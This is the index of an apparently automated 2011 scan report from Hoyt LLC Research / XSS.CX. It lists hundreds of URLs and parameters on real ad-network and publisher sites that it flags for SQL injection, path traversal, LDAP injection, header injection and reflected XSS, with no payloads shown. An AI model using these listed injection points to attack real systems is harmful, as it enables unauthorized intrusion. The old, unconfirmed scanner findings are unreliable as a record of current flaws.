XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05112011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Wed May 11 12:17:52 CDT 2011.

Loading


1. SQL injection

1.1. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11 [name of an arbitrarily supplied request parameter]

1.2. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11 [sz parameter]

1.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [campID parameter]

1.4. http://ad.doubleclick.net/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [sz parameter]

1.5. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.2 [name of an arbitrarily supplied request parameter]

1.6. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 [name of an arbitrarily supplied request parameter]

1.7. http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.4 [name of an arbitrarily supplied request parameter]

1.8. http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.4 [sz parameter]

1.9. http://ad.doubleclick.net/adj/N6715.274177.WEBMD.COM/B5443050.15 [name of an arbitrarily supplied request parameter]

1.10. http://ad.doubleclick.net/adj/N6715.274177.WEBMD.COM/B5443050.15 [sz parameter]

1.11. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [name of an arbitrarily supplied request parameter]

1.12. http://cspix.media6degrees.com/orbserv/hbpix [acs cookie]

1.13. http://cspix.media6degrees.com/orbserv/hbpix [clid cookie]

1.14. http://m.trb.com/b/ss/tribglobal/1/H.22.1/s59644513663370 [REST URL parameter 4]

1.15. http://map.media6degrees.com/orbserv/hbpix [rdrlst cookie]

1.16. http://p.addthis.com/pixel [key parameter]

1.17. http://player.ooyala.com/player.js [autoplay parameter]

1.18. http://www.mayoclinic.com/health/pink-eye/DS00258 [REST URL parameter 3]

1.19. http://www.mayoclinic.com/health/pink-eye/DS00258 [name of an arbitrarily supplied request parameter]

1.20. http://www.starpulse.com/sp_comments/paginate_comments.php [object_type parameter]

1.21. http://www.zap2it.com/zap-partners-iframe,0,2002648.blurb [name of an arbitrarily supplied request parameter]

2. File path traversal

2.1. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [featurecat parameter]

2.2. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [featuretype parameter]

2.3. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [mName parameter]

3. LDAP injection

3.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

3.2. http://cspix.media6degrees.com/orbserv/hbpix [rdrlst cookie]

3.3. http://data.cmcore.com/imp [ci parameter]

3.4. http://oascentral.blogher.org/RealMedia/ads/adstream_jx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/@Middle,Left!Middle [OAX cookie]

4. HTTP header injection

4.1. http://ad.doubleclick.net/ad/N5019.252469.POPSUGAR.COM/B5379556.47 [REST URL parameter 1]

4.2. http://ad.doubleclick.net/ad/N6374.137661.GLAM/B5287030.24 [REST URL parameter 1]

4.3. http://ad.doubleclick.net/ad/sugar.pop/track [REST URL parameter 1]

4.4. http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11 [REST URL parameter 1]

4.5. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11 [REST URL parameter 1]

4.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [REST URL parameter 1]

4.7. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 1]

4.8. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [REST URL parameter 1]

4.9. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [REST URL parameter 1]

4.10. http://ad.doubleclick.net/adi/N5685.127408.8193638746421/B5509356.2 [REST URL parameter 1]

4.11. http://ad.doubleclick.net/adi/N6374.137661.GLAM/B5287030.20 [REST URL parameter 1]

4.12. http://ad.doubleclick.net/adi/sugar.tres/gallery [REST URL parameter 1]

4.13. http://ad.doubleclick.net/adj/N2434.access/B5401633 [REST URL parameter 1]

4.14. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.2 [REST URL parameter 1]

4.15. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 [REST URL parameter 1]

4.16. http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.3 [REST URL parameter 1]

4.17. http://ad.doubleclick.net/adj/N4518.z2i/B5479389.3 [REST URL parameter 1]

4.18. http://ad.doubleclick.net/adj/N4518.z2i/B5479389.4 [REST URL parameter 1]

4.19. http://ad.doubleclick.net/adj/N4518.z2i/B5479389.7 [REST URL parameter 1]

4.20. http://ad.doubleclick.net/adj/N5687.135388.BIZO/B5483330 [REST URL parameter 1]

4.21. http://ad.doubleclick.net/adj/bnet.C0609/P0249 [REST URL parameter 1]

4.22. http://ad.doubleclick.net/adj/cm.starpulse/srb_jbl_042911 [REST URL parameter 1]

4.23. http://ad.doubleclick.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 1]

4.24. http://ad.doubleclick.net/adj/sugar.tres/gallery [REST URL parameter 1]

4.25. http://ad.doubleclick.net/adj/sugar.tres/ros [REST URL parameter 1]

4.26. http://ad.doubleclick.net/adj/trb.zap2it/ntl/community [REST URL parameter 1]

4.27. http://ad.doubleclick.net/adj/trb.zap2it/ntl/hp [REST URL parameter 1]

4.28. http://ad.doubleclick.net/adj/trb.zap2it/ntl/video [REST URL parameter 1]

4.29. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

4.30. http://ad.doubleclick.net/pfadx/starpulse_cim/ [name of an arbitrarily supplied request parameter]

4.31. http://ad.doubleclick.net/pfadx/starpulse_cim/ [secure parameter]

4.32. http://ad.doubleclick.net/pfadx/zap2it_cim/ [name of an arbitrarily supplied request parameter]

4.33. http://ad.doubleclick.net/pfadx/zap2it_cim/ [secure parameter]

4.34. http://amch.questionmarket.com/adsc/d872313/2/873601/adscout.php [ES cookie]

4.35. http://bidder.mathtag.com/iframe/notify [exch parameter]

4.36. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

4.37. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

4.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

4.39. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]

4.40. http://c7.zedo.com/utils/ecSet.js [v parameter]

4.41. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/22NAU6HRG5G2PGRKDKJIVI [REST URL parameter 2]

4.42. http://www22.glam.com/cTagsImgCmd.act [gname parameter]

5. Cross-site scripting (reflected)

5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

5.10. http://a.collective-media.net/adj/bzo.217/L3_5490311 [REST URL parameter 2]

5.11. http://a.collective-media.net/adj/bzo.217/L3_5490311 [REST URL parameter 3]

5.12. http://a.collective-media.net/adj/bzo.217/L3_5490311 [name of an arbitrarily supplied request parameter]

5.13. http://a.collective-media.net/adj/bzo.217/L3_5490311 [sz parameter]

5.14. http://a.collective-media.net/adj/cm.pub_webmd/ [REST URL parameter 2]

5.15. http://a.collective-media.net/adj/cm.pub_webmd/ [name of an arbitrarily supplied request parameter]

5.16. http://a.collective-media.net/adj/cm.pub_webmd/ [sz parameter]

5.17. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [REST URL parameter 2]

5.18. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [REST URL parameter 3]

5.19. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [name of an arbitrarily supplied request parameter]

5.20. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [srb parameter]

5.21. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 2]

5.22. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 3]

5.23. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 4]

5.24. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [cmn parameter]

5.25. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [name of an arbitrarily supplied request parameter]

5.26. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [REST URL parameter 1]

5.27. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [REST URL parameter 2]

5.28. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [REST URL parameter 3]

5.29. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [sz parameter]

5.30. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 1]

5.31. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 2]

5.32. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 3]

5.33. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 4]

5.34. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [cmn parameter]

5.35. http://a.rfihub.com/sed [pa parameter]

5.36. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]

5.37. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]

5.38. http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11 [name of an arbitrarily supplied request parameter]

5.39. http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11 [sz parameter]

5.40. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [adurl parameter]

5.41. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [ai parameter]

5.42. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [client parameter]

5.43. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [num parameter]

5.44. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [sig parameter]

5.45. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [sz parameter]

5.46. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [campID parameter]

5.47. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [crID parameter]

5.48. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [partnerID parameter]

5.49. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [pub parameter]

5.50. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [pubICode parameter]

5.51. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [sz parameter]

5.52. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [url parameter]

5.53. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.2 [name of an arbitrarily supplied request parameter]

5.54. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.2 [sz parameter]

5.55. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.3 [name of an arbitrarily supplied request parameter]

5.56. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.3 [sz parameter]

5.57. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [adurl parameter]

5.58. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [ai parameter]

5.59. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [client parameter]

5.60. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [num parameter]

5.61. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [sig parameter]

5.62. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [sz parameter]

5.63. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [adurl parameter]

5.64. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [ai parameter]

5.65. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [client parameter]

5.66. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [num parameter]

5.67. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [sig parameter]

5.68. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [sz parameter]

5.69. http://ad.doubleclick.net/adj/N2434.access/B5401633 [sz parameter]

5.70. http://ad.doubleclick.net/adj/cardinals.mlb/news [name of an arbitrarily supplied request parameter]

5.71. http://ad.doubleclick.net/adj/cardinals.mlb/news [pageid parameter]

5.72. http://ad.doubleclick.net/adj/cm.starpulse/srb_jbl_042911 [net parameter]

5.73. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [adurl parameter]

5.74. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [ai parameter]

5.75. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [client parameter]

5.76. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [num parameter]

5.77. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [sig parameter]

5.78. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [sz parameter]

5.79. http://ad.doubleclick.net/adj/sugarhouseads/house [name of an arbitrarily supplied request parameter]

5.80. http://ad.doubleclick.net/adj/trb.zap2it/ntl/community [pos parameter]

5.81. http://ad.doubleclick.net/adj/trb.zap2it/ntl/community [rs parameter]

5.82. http://ad.doubleclick.net/adj/trb.zap2it/ntl/hp [;ptype parameter]

5.83. http://ad.doubleclick.net/adj/trb.zap2it/ntl/hp [name of an arbitrarily supplied request parameter]

5.84. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [dcopt parameter]

5.85. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [pos parameter]

5.86. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [sz parameter]

5.87. http://ad.doubleclick.net/adj/trb.zap2it/ntl/video [rs parameter]

5.88. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

5.89. http://ad.media6degrees.com/adserv/cs [tId parameter]

5.90. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]

5.91. http://ad.turn.com/server/bid/fan.bid [requestId parameter]

5.92. http://ad.turn.com/server/pixel.htm [fpid parameter]

5.93. http://ad.turn.com/server/pixel.htm [sp parameter]

5.94. http://ad.yieldmanager.com/getbid [callback parameter]

5.95. http://ad.yieldmanager.com/getbid [u parameter]

5.96. http://ads.adbrite.com/adserver/vdi/753292 [REST URL parameter 3]

5.97. http://ads.pointroll.com/PortalServe/ [flash parameter]

5.98. http://ads.pointroll.com/PortalServe/ [redir parameter]

5.99. http://ads.pointroll.com/PortalServe/ [time parameter]

5.100. http://ads.specificmedia.com/serve/v=5 [m parameter]

5.101. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

5.102. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [auto_ctl_invite parameter]

5.103. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [code parameter]

5.104. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]

5.105. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [loc parameter]

5.106. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]

5.107. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [noiframe parameter]

5.108. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [p parameter]

5.109. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [protocol parameter]

5.110. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]

5.111. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

5.112. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

5.113. http://api.zap2it.com/tvlistings/webservices/celebsontv [callback parameter]

5.114. http://api.zap2it.com/tvlistings/webservices/checkin [callback parameter]

5.115. http://api.zap2it.com/tvlistings/webservices/checkin [md parameter]

5.116. http://api.zap2it.com/tvlistings/webservices/peopleFinder [callback parameter]

5.117. http://api.zap2it.com/tvlistings/webservices/peopleFinder [name parameter]

5.118. http://api.zap2it.com/tvlistings/zbPrimeTimeGrid.jsp [aid parameter]

5.119. http://api.zap2it.com/tvlistings/zbPrimeTimeGrid.jsp [name of an arbitrarily supplied request parameter]

5.120. http://api.zap2it.com/tvlistings/zbPrimeTimeGrid.jsp [sList parameter]

5.121. http://api.zap2it.com/tvlistings/zbPrimeTimeGrid.jsp [v parameter]

5.122. http://ar.voicefive.com/b/rc.pli [func parameter]

5.123. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.124. http://b.scorecardresearch.com/beacon.js [c10 parameter]

5.125. http://b.scorecardresearch.com/beacon.js [c15 parameter]

5.126. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.127. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.128. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.129. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.130. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.131. http://b3.mookie1.com/2/RubiconB3/ATTWL/11Q1/T1/728/1458638753@x90 [REST URL parameter 2]

5.132. http://b3.mookie1.com/2/RubiconB3/ATTWL/11Q1/T1/728/1458638753@x90 [REST URL parameter 3]

5.133. http://b3.mookie1.com/2/RubiconB3/ATTWL/11Q1/T1/728/1458638753@x90 [REST URL parameter 4]

5.134. http://b3.mookie1.com/2/RubiconB3/ATTWL/11Q1/T1/728/1458638753@x90 [REST URL parameter 5]

5.135. http://b3.mookie1.com/2/RubiconB3/ATTWL/11Q1/T1/728/1458638753@x90 [REST URL parameter 6]

5.136. http://b3.mookie1.com/2/RubiconB3/ATTWL/11Q1/T1/728/1458638753@x90 [REST URL parameter 7]

5.137. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 10]

5.138. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 11]

5.139. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 4]

5.140. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 5]

5.141. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 6]

5.142. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 7]

5.143. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 8]

5.144. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 9]

5.145. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]

5.146. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]

5.147. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [q parameter]

5.148. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [q parameter]

5.149. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [REST URL parameter 1]

5.150. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [REST URL parameter 2]

5.151. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [REST URL parameter 3]

5.152. http://choices.truste.com/ca [c parameter]

5.153. http://choices.truste.com/ca [h parameter]

5.154. http://choices.truste.com/ca [h parameter]

5.155. http://choices.truste.com/ca [plc parameter]

5.156. http://choices.truste.com/ca [w parameter]

5.157. http://choices.truste.com/ca [w parameter]

5.158. http://choices.truste.com/ca [zi parameter]

5.159. http://ct.buzzfeed.com/wd/UserWidget [amp;or parameter]

5.160. http://ct.buzzfeed.com/wd/UserWidget [u parameter]

5.161. http://delb.opt.fimserve.com/adopt/ [sz parameter]

5.162. http://demr.opt.fimserve.com/adopt/ [sz parameter]

5.163. http://ds.addthis.com/red/psi/sites/www.medicinenet.com/p.json [callback parameter]

5.164. http://ds.addthis.com/red/psi/sites/www.shefinds.com/p.json [callback parameter]

5.165. http://event.adxpose.com/event.flow [uid parameter]

5.166. http://fim.adnxs.com/fpt [callback parameter]

5.167. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 2]

5.168. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 3]

5.169. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 4]

5.170. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 5]

5.171. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 6]

5.172. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 7]

5.173. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [name of an arbitrarily supplied request parameter]

5.174. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [sz parameter]

5.175. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [REST URL parameter 2]

5.176. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [REST URL parameter 3]

5.177. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [REST URL parameter 4]

5.178. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [REST URL parameter 5]

5.179. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [REST URL parameter 6]

5.180. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [REST URL parameter 7]

5.181. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [name of an arbitrarily supplied request parameter]

5.182. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [sz parameter]

5.183. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [REST URL parameter 2]

5.184. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [REST URL parameter 3]

5.185. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [REST URL parameter 4]

5.186. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [REST URL parameter 5]

5.187. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [REST URL parameter 6]

5.188. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [REST URL parameter 7]

5.189. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [name of an arbitrarily supplied request parameter]

5.190. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [sz parameter]

5.191. http://googleads.g.doubleclick.net/pagead/ads [url parameter]

5.192. http://home.onsugar.com/Help-7550950 [REST URL parameter 1]

5.193. http://home.onsugar.com/Help-7550950 [REST URL parameter 1]

5.194. http://home.onsugar.com/Live-OnSugar-7671020 [REST URL parameter 1]

5.195. http://home.onsugar.com/Live-OnSugar-7671020 [REST URL parameter 1]

5.196. http://home.onsugar.com/Our-Blog-7550881 [REST URL parameter 1]

5.197. http://home.onsugar.com/Our-Blog-7550881 [REST URL parameter 1]

5.198. http://home.onsugar.com/api [REST URL parameter 1]

5.199. http://home.onsugar.com/api [REST URL parameter 1]

5.200. http://ib.adnxs.com/ab [ccd parameter]

5.201. http://ib.adnxs.com/ab [custom_macro parameter]

5.202. http://ib.adnxs.com/ptj [redir parameter]

5.203. http://img.mediaplex.com/content/0/14941/119091/DallasCancer-OPEN_728x90.js [mpck parameter]

5.204. http://img.mediaplex.com/content/0/14941/119091/DallasCancer-OPEN_728x90.js [mpck parameter]

5.205. http://img.mediaplex.com/content/0/14941/119091/DallasCancer-OPEN_728x90.js [mpvc parameter]

5.206. http://img.mediaplex.com/content/0/14941/119091/DallasCancer-OPEN_728x90.js [mpvc parameter]

5.207. http://js.revsci.net/gateway/gw.js [csid parameter]

5.208. http://k.collective-media.net/cmadj/cm.pub_webmd/ [REST URL parameter 2]

5.209. http://k.collective-media.net/cmadj/cm.starpulse/srb_jbl_042911 [REST URL parameter 2]

5.210. http://kona5.kontera.com/KonaGet.js [l parameter]

5.211. http://kona5.kontera.com/KonaGet.js [rId parameter]

5.212. http://mpd.mxptint.net/1/S54.API/G1/T83/js [mid parameter]

5.213. http://pglb.buzzfed.com/152897/5431115cf30fb8db156a83665a16d6bf [callback parameter]

5.214. http://pglb.buzzfed.com/36074/2562cc529bca26e674ad88fb4414a137 [callback parameter]

5.215. http://pglb.buzzfed.com/36074/eccf772705f3b3dc37349256b06e34d7 [callback parameter]

5.216. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.217. http://rtb.media6degrees.com/adserv/FanBidHandler [callback parameter]

5.218. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

5.219. http://s27.sitemeter.com/js/counter.asp [site parameter]

5.220. http://s27.sitemeter.com/js/counter.js [site parameter]

5.221. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

5.222. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

5.223. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

5.224. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

5.225. http://starpulse.us.intellitxt.com/al.asp [jscallback parameter]

5.226. http://starpulse.us.intellitxt.com/iframescript.jsp [src parameter]

5.227. http://starpulse.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

5.228. http://starpulse.us.intellitxt.com/v4/advert [jscallback parameter]

5.229. http://starpulse.us.intellitxt.com/v4/context [jscallback parameter]

5.230. http://starpulse.us.intellitxt.com/v4/init [jscallback parameter]

5.231. http://starpulse.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

5.232. http://stlouis.cardinals.mlb.com/news/article.jsp [c_id parameter]

5.233. http://stlouis.cardinals.mlb.com/news/article.jsp [content_id parameter]

5.234. http://stlouis.cardinals.mlb.com/news/article.jsp [name of an arbitrarily supplied request parameter]

5.235. http://stlouis.cardinals.mlb.com/news/article.jsp [notebook_id parameter]

5.236. http://stlouis.cardinals.mlb.com/news/article.jsp [vkey parameter]

5.237. http://stlouis.cardinals.mlb.com/news/article.jsp [ymd parameter]

5.238. http://stlouis.cardinals.mlb.com/style/nav_2011.jsp [section parameter]

5.239. http://tag.admeld.com/ad/json/100/glammedia/160x600/8156650 [REST URL parameter 6]

5.240. http://tag.admeld.com/ad/json/100/glammedia/160x600/8156650 [callback parameter]

5.241. http://tag.admeld.com/ad/json/100/glammedia/160x600/8156650 [container parameter]

5.242. http://tag.admeld.com/ad/json/100/glammedia/300x250/8156650 [REST URL parameter 6]

5.243. http://tag.admeld.com/ad/json/100/glammedia/300x250/8156650 [callback parameter]

5.244. http://tag.admeld.com/ad/json/100/glammedia/300x250/8156650 [container parameter]

5.245. http://theblogfrog.com/widgets/CommunityWidget.aspx [BlogID parameter]

5.246. http://theblogfrog.com/widgets/CommunityWidget.aspx [basecommurl parameter]

5.247. http://theblogfrog.com/widgets/CommunityWidget.aspx [forumn parameter]

5.248. http://theblogfrog.com/widgets/CommunityWidget.aspx [widget_intro parameter]

5.249. http://theblogfrog.com/widgets/CommunityWidget.aspx [widget_title parameter]

5.250. http://theblogfrog.com/widgets/VisitorWidget.aspx [BlogID parameter]

5.251. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

5.252. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

